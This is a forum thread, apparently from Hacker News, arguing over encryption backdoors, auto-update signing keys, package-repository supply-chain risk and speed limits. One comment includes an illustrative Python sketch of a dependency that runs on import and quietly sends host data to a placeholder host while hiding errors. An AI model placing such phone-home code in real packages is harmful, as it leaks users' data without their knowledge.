You don't need to "outlaw math"; you only need to increase the friction to the point where commercial providers can't offer encrypted services, and 99.x% of people will comply. Not sure why people always bring this up as if it were some gotcha.
The whole chain of e-commerce rests on the foundations of strong encryption; backdooring that would open the door to digital crime at a level that is off the scale compared to where it is today. The illusion that a government-mandated backdoor will remain accessible only to the government is not going to last much longer than the first experiment in this direction.
We've already seen plenty of examples of that irl.
> The illusion that a government mandated backdoor will remain accessible just to the government is not going to last much longer than the first experiment in this direction.
I'm sympathetic to that argument, but it seems to be employed very selectively by the tech industry.
We already rely on many backdoors of exactly that kind in the form of mandatory auto-updates. Not only is this seen as perfectly fine, it's widely regarded as a security best practice.
Why can Apple or Google or Microsoft manage to keep their signing keys secure for decades, while any keys managed by a government agency would leak with mathematical certainty?
Auto-updates are a big security risk in themselves; it is only a matter of time before someone manages to hijack a major distribution point like that (Windows, Chrome, Firefox?). Once that happens we will probably revisit this.
Also: who is to say that Apple, Google or Microsoft do manage to keep their keys secret? Not all thieves would be stupid enough to tell, and nation-states tend to hold such advantages on ice until they have a good enough reason to use them.
> Auto updates are a big security risk themselves, it is a matter of time before someone manages to hijack a major distribution point like that (Windows, Chrome, Firefox?). Once that happens we will probably review this.
And as some lower-hanging fruit: The repos of common programming languages and things like Docker Hub.
Python's pip, Node.js's npm, Ruby's gems: we pull in a lot of code from people we don't even know. Every Python project installs a gazillion packages from its requirements.txt. At least the OS updates come from a party we chose to do business with.
And it's not like this isn't already happening. But I think it'll take a major WannaCry-scale event before we stop doing this, because it's just so damn handy.
But if you think about it, imagine you're coding and some random 'willywonka2586' in a public Slack group says "Hey, I wrote a handy library for that; here, go install it and use it in a project for your customers!" That's basically what we're doing.
This actually happened at a company I worked for. One of the Python dependencies of some service or other had a bit of code that phoned home. It was hard to detect, because it actually did the thing it advertised; it just added the phone-home part on top. It was only detected because the way routing works inside AWS didn't allow it to phone home, and that generated a lot of network timeouts. IIRC, it took more than 90 days before the malicious library was found and removed.
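For what it's worth, the pattern is depressingly simple. A minimal sketch of what such a dependency can look like; the function, hostname and payload below are entirely made up for illustration:

```python
# Hypothetical sketch of a "does its job, but also phones home" dependency.
# The function, hostname and payload are invented for illustration only.
import json
import platform
import urllib.request


def slugify(text: str) -> str:
    """The advertised, legitimate functionality."""
    return "-".join(text.lower().split())


def _phone_home() -> None:
    """Quietly send host metadata; blocked egress surfaces as network timeouts."""
    payload = json.dumps({"host": platform.node()}).encode()
    try:
        urllib.request.urlopen(
            "https://collector.example.invalid/beacon", data=payload, timeout=5
        )
    except Exception:
        pass  # swallow errors so the library still appears to work


_phone_home()  # runs on import, right next to the real feature
```

Nothing in a requirements.txt install step would flag this; only egress monitoring or a code review of the dependency itself would.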
OK, but then where is the large-scale movement against auto-updates? Stealing an update signing key would grant an attacker strictly more capabilities than stealing a chat backdoor key: they could still eavesdrop on all chats by patching the apps on-device, but they could also do anything else the device's OS allows them to. Nevertheless, I have never read anything about the imminent risk of update compromise.
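To make the comparison concrete, this is roughly what the trust model of a signed auto-update boils down to; a simplified sketch using Ed25519 from the `cryptography` package, not any vendor's actual pipeline:

```python
# Simplified sketch of signed auto-update verification (not any vendor's real scheme).
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Vendor side: the long-lived signing key.
signing_key = Ed25519PrivateKey.generate()
verify_key = signing_key.public_key()      # baked into every installed client

update_blob = b"...new application binary..."
signature = signing_key.sign(update_blob)

# Client side: the only gate before the payload is installed and executed.
verify_key.verify(signature, update_blob)  # raises InvalidSignature on tampering
# If this passes, the client runs the blob with full app privileges, so whoever
# holds the private key can ship arbitrary code, chat interception included.
```

The whole scheme rests on the private key staying private, which is exactly the assumption a mandated backdoor key would rest on.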
Such an attack would be discovered and mitigated quickly. Mandating that the backdoor be present would mean you have to wait for the government to mitigate the problem six months later and hope that it doesn't fall again soon after.
At worst, the entire industry in that region would be broken more often than it is functional. It's also notable that companies existing in this state of brokenness would be competing with companies living in a functional world. One might find that the defective universe persists just long enough for its inhabitants to go extinct.
> Not only is this seen as perfectly fine, it's widely regarded as a security best practice.
It's not "perfectly fine"; but the alternative is millions of computers with known security vulnerabilities exploitable by anyone, which is far far worse than a potential backdoor used by large companies or governments.
You could make that same argument in favour of the e2e backdoor: "The risk of child groomers, terrorists etc running rampant is far greater than the risk of a few chats getting leaked."
At the very least, this would need some quantification of risk: Probability and impact of keys getting leaked vs probability and impact of not installing a backdoor.
> The illusion that a government mandated backdoor will remain accessible just to the government is not going to last much longer than the first experiment in this direction. We've already seen plenty of examples of that irl.
Unfortunately, our beloved decision-makers are gerontocratic, completely incompetent and bought out by corporate interests that also don't want encryption (e.g. the copyright industry).
Alcohol prohibition, and then drug prohibition later, opened the doors to crime at an off-scale level compared to before. (Granted that it wasn't the same kind of door-opening.)
The fact that X makes things worse for people in general just isn't strong evidence that governments will not do X. If you don't want X, then you need to push back explicitly.
Except of course that this is entirely unlike speed limits.
In a nutshell, and in case it didn't register with you when it should have: attempts to curb cryptography have been made in the past. The phrase 'you can't outlaw math' is a simple observation: strong cryptography will be available to everybody who wants it, regardless of its legal status. So a government that would love to read your mail would do better to realize that it will only be able to read the uninteresting mail; for the rest it will be staring at white noise. Meanwhile the baddies, alerted to the fact that the government is able to read your mail, will either resort to other methods of communication or will use channels they assume to be overt to signal covertly by other means. There are plenty of examples of this.
So, in conclusion: no matter how much you want to outlaw strong cryptography, those who want it will have it. Better to plan accordingly, or all you will do is waste more time reading data that you will find stupendously boring.
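As a rough illustration of how low that bar is, here is what strong, authenticated encryption looks like with a widely mirrored open-source library (a minimal sketch using the `cryptography` package; the message is obviously made up):

```python
# Minimal sketch: authenticated symmetric encryption with the open-source
# `cryptography` package (pip install cryptography).
from cryptography.fernet import Fernet

key = Fernet.generate_key()   # 32 random bytes, base64-encoded
box = Fernet(key)             # AES-128-CBC plus HMAC-SHA256 under the hood

token = box.encrypt(b"nothing interesting ever happens here")
print(box.decrypt(token))     # without `key`, the token is just noise
```

A ban can remove this from app stores and commercial services; it can't remove it from the handful of lines above.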
This is not about hardcore cypherpunks or terrorists who want encryption at any cost.
This is about Joe Random using WhatsApp. And now he has some Xanax, and Pete over there says he deals. Joe probably won't have strong encryption if it is properly outlawed, even if he is a low-level dealer.
Because the thing is, making encryption software is hard. I doubt there will be convenient, easy-to-install software out there if you ban this stuff. And the majority of people won't use it if it isn't convenient and easy to install.
> So a government that would love to read your mail would do better to realize that they will only be able to read the uninteresting mail and for the rest of it they'll be staring at white noise
This is the crux of your argument, but it's false. E2EE has been available for decades but it wasn't used widely, by everyone including criminals, until it was pushed as the default.
Strong encryption has been available for decades as well, but it wasn't used widely until HTTPS and encrypted email. What is your point? That availability doesn't equate to use? That's obvious. But now that it is widely used, nothing has really changed; we're back where we started: traffic analysis and HUMINT, which is not a bad basis for an investigation or an infiltration op.
It's not as if all of the old volume of mail was steamed open and read, or every TV was equipped with monitoring equipment. Even libraries did not track who read what (though they did track who borrowed what).
It's more like, "If you outlaw guns, the only people with guns will be outlaws."
And regarding internet privacy and secure communications, that's exactly what they want: for privacy to be associated (in the mind of the average citizen) with organized crime, terrorism and pedophilia.
Yet 99% of people break that speed limit regularly. We all know speed limit laws are less about public safety and more about generating revenue for the state, at least in the US anyway.
And 99.x% of people aren't sharing child porn anyway; it's the 0.1% of motivated criminals who will share encrypted files no matter what the law is. They will find ways around the law; they always do.
This is a thinly veiled excuse to take basic human rights away from people.
I'm curious where you get your information about speeding, because it kind of seems made up.
Speeding has been tied to one third of traffic fatalities over the last 20 years (https://www.nhtsa.gov/risky-driving/speeding), so of course speed limits are put in place in an attempt to increase safety on the road. There are plenty of arguments to be made about the best way to enforce speed limits, or about ways to discourage aggressive driving (such as speeding), but there is little doubt that speeding is dangerous.
"Speed related" is another one of those examples where the government lies with statistics to sell some safety FUD while failing to address the root cause of the problem.
Countries such as Germany have much lower traffic fatality rates than the USA, yet they operate vehicles at much higher speeds. Speed isn't the problem... uneducated drivers, poor vehicle maintenance, poor road quality, etc. are the problem. But fixing those things would upset the masses, who think they are entitled to operate a vehicle for 50 years after 2 months of training and a 15-minute test. So (in the USA) we get the lowest common denominator, and roadways engineered to handle vehicles at 80+ mph are stuck with 55 mph speed limits.
>Speed isn't the problem... uneducated drivers, poor vehicle maintenance, poor road quality, etc are the problem.
Speed isn't the problem, and neither, on its own, is any of the others you mentioned. They all add to the problem of traffic fatalities, though.
They did a study in Germany and were able to halve traffic fatalities by adding a 130 km/h speed limit on one Autobahn section, measured over 3 years.[1]
Sure you can improve road conditions and driver education, but a multi-pronged approach including speed limits is sensible.
> We all know speed limit laws are less about public safety, and more about generating revenue for the state, at least in the US anyway.
That's absolutely not true. Sure, some stretches are just there to generate revenue, but the fact that you're not allowed to go 200 km/h through a city is not about revenue generation. It's also not something common sense takes care of on its own; the fact that you need to set the limit 20 below what's actually safe should be plenty of evidence.
I don't see how the rest of his point doesn't stand, though. How are they going to implement this? How are they going to "increase friction"?
This is an impossible task. There is no way they will be able to enforce this. It would literally require them to stick their dirty fingers into every piece of software built in the EU.
They can attack large corporations like ISPs and such and force them to do certain things, sure, but there is no way they can "ban" any kind of encryption with any real success, because, as the OC said, it's basically trying to outlaw mathematics. Forcing ISPs to perform deep packet inspection or whatever won't change the axioms of mathematics or fundamentally alter computer science so that they can suddenly break encrypted data coming from their clients.
It depends on whether the actual goal is to catch criminals or to monitor the average Joe. This law won't do anything against criminals ("you can't outlaw math"), but will work very effectively against the average Joe (all major software companies will be forced to comply).
Of course, the argument is that this is to combat criminals and we all know that it doesn't work that way, but it doesn't matter at the end of the day if the true goal is to just monitor people.
You think governments aren't interested in analyzing the private communications of the population? There's a long list of intelligence programs on Wikipedia that suggests otherwise. Governments are obviously interested in both, with interests going way beyond crime.
And another fact is that these bans can even give you access to the people operating outside the law. Practical example: Australia's sting operation of pushing its own 'secure' app on the black market to lure criminals in (https://www.washingtonpost.com/world/2021/06/08/fbi-app-arre...).
Agreed; I would not even be surprised if this is being pushed by the larger established email/communication companies as a way to crush smaller competition, in much the same way Facebook pushes for regulations that only Facebook can afford to implement.